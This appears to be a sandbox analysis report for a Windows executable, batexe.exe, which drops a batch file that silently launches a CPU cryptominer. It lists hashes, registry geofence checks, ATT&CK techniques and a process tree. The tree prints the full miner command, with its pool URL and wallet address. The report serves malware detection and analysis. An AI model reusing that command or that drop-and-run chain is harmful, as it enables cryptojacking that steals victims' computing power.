73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21-02-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
984	b2e.exe
2292	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe
2292	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3900-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3900 wrote to memory of 984	3900	batexe.exe	84
PID 3900 wrote to memory of 984	3900	batexe.exe	84
PID 3900 wrote to memory of 984	3900	batexe.exe	84
PID 984 wrote to memory of 2184	984	b2e.exe	85
PID 984 wrote to memory of 2184	984	b2e.exe	85
PID 984 wrote to memory of 2184	984	b2e.exe	85
PID 2184 wrote to memory of 2292	2184	cmd.exe	88
PID 2184 wrote to memory of 2292	2184	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C6F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe

Filesize
7.9MB

MD5
fba0e689b13e0710d82f43a9a1daf5b2

SHA1
7ee2e83f62855d99f5443d66650c07b72e90387b

SHA256
f6324e30eb02b2b8c1d73cd46c756e896a0edfe63eb508983cc6b26512633d93

SHA512
416fcfd87f72f3a17f3ed45f25f57f8963ecac148dde354c8efb20389d3d94075f079a4be44b13d31607dc249074787defd508fdb2e7f77f5d57299fc62d9a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe

Filesize
1.9MB

MD5
db5c09852a9dce74cc260d402b8487bb

SHA1
7f53cb14088c23cb2140e52b245535100dfbea85

SHA256
e7a5f75e6901b233b87b806134d5bea194e44705f263f86f471c89fd16d9e262

SHA512
83f204c1b641a7c4e33b91cad2fe52c450637ff5653a8d98709d728f7930e9a9e13ceb974c2cf8e622f5ded0766ec86ca01684e3af80f6fd00100c27f36df133

Download Submit
C:\Users\Admin\AppData\Local\Temp\94ED.tmp\b2e.exe

Filesize
2.6MB

MD5
a5e5df886b731a106be5ffdd55d5eba6

SHA1
49f0ee9c3161b956d8752bd7c4c5351bd2dc0fe6

SHA256
39d92aa54aff7dc78100a84d70011578f98cc2bc56d73853a24a1b39d77c26e7

SHA512
105723e9e49510157b696057447d2278e9bde945c3ab9882a6d364a2406b7080370e05849909f24bcd79f3ea6ec13fa100364d11a150f3b5a708e8762d49817f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9C6F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
368KB

MD5
fdc3ed3e8d8a5aa8f42eba27445e5740

SHA1
830f25d10306d402c87f417f4d5c0abf4f198c5e

SHA256
36311df81e4afe9f75c4b463c4e2374e8a1c4de22f822aaf60cb60c4596adb08

SHA512
b352673d35ccd973dacb5ffb20fa11e2e3c899089e294d41fe4e86e01168c66c231232f19eab85fadf37bbd4ca47a8ede213e7607454e990d48db121d128c3a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
425KB

MD5
1139d6b3c4d63ddb3efd49800017a681

SHA1
44a3319271848a40b6da8bd12c3636c1ee46d70c

SHA256
6f334fcfbfdf9d8e7a5524be04d46fd0b7606ba2c7a4b778889a355bc4a87f97

SHA512
7df506a29d7c507a87a61ddeecbbbcb1f10a980d058dae9a4b593c30fad5700185a8948ac33ff02102ab6d72c95799ca2de782e1286604e5ecf283d8ea79505f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
220KB

MD5
7164c1997a0bb7f3cd7db2c0d94cd925

SHA1
6083862892aa38cd86fd63ee0d2cb9cc14c06043

SHA256
f39efd1da3e48feb34b2c2a75ddcc6aa243f61327396284ec65ee855eb9ed54c

SHA512
abf863cd8fcc9b5e2e9050ab1b134fdc98bac665f1cde8556cc8bcf30ddb66b8d285508ac0eda5a19a3a25cebb2a13d3990b305d4e67a8413667e46bfba3d36d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
448KB

MD5
19a61444b6e2d01755ede80960bca19c

SHA1
e0c7222784d3e2b3329ec3280648b17fd60ef209

SHA256
13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

SHA512
bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
444KB

MD5
beb778354a10649493fba67a4fee7d61

SHA1
d584e9b0991b5e6485f3085fd6874fcfa111886d

SHA256
389556713d412a307c4d6cf9c8149b680b2a806fe38aa2f05b2fbbe53126affc

SHA512
1b868e43b2316facf2747942660d67390cd18db51c48640f4864c4cf256a8d5f549d5543870bcca58628a682723ac230461ccaceab8e65f4d95e7821219cce5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
164KB

MD5
1790b9febfc68219d3e86358adb911ce

SHA1
b3988bf1b3f26632dc1a3a338c7d93f9cd908bcf

SHA256
0e328a76944eaf5a05c29c0b71c345cd1a9d8e5190d6892b03f2481f3a8abca7

SHA512
bce6ec8776672886d7e0ae9be10b553d9695018021e93c12855c92d9a586bf16e7b306132916c18a72aac3317bb3de6baf540ee520ae5f9397e1f02d1f5a71f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
111KB

MD5
11bf1e91ee4ee33a09e29d765df5eb3b

SHA1
d43ab4fcfab7c709b3777447b58bf228bbbfc579

SHA256
a1481ff81b4ae6024ba174e9d03e17b6ebf9a60fe83e0fdbfc8cbb6fa379acc6

SHA512
127ea9c5b8292d57ec99955d46f8315728bfc414da799c933862f993a380d64e0aa01cb19733466be83167dde58525c16330e92f0cfe89c6a1f0ee7eb4addc10

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
105KB

MD5
877ecfefd7abcba05a11df8f272b2b72

SHA1
c92d82ce7715af1a5ee15af92ced092655040112

SHA256
01938aea943d634d3124e0af0b36b818aee4f0aa8864dd053f2eae92a8185d1a

SHA512
b9ead917816111b04830af58aa0653b59c801b6c7bbef4a896a33431d2b09e5eb7c229d118161ca4399049bff029a44e5e33f78c32b25ed0ef05d68e7b715560

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
143KB

MD5
ef368255d0014366b5e1c4ede7b73aa5

SHA1
0432c95715ceb305033d3cb3cc6ef39948ecb8c9

SHA256
279c29c98cb72111e96e7537f61ce3f851b78b7740b9cadee037b3c25f2a48ff

SHA512
c1f5cdd6025339fbc79ddda2e9d2e9595d647af8cb9101a13782da5e42dc3341b16014e8e2352c3adb4d67b6e5c526cbfeaaa7898253255578642376c0178e63

Download Submit
memory/984-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/984-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2292-46-0x0000000061140000-0x00000000611D8000-memory.dmp

Filesize
608KB

Download
memory/2292-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2292-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2292-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2292-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2292-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3900-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download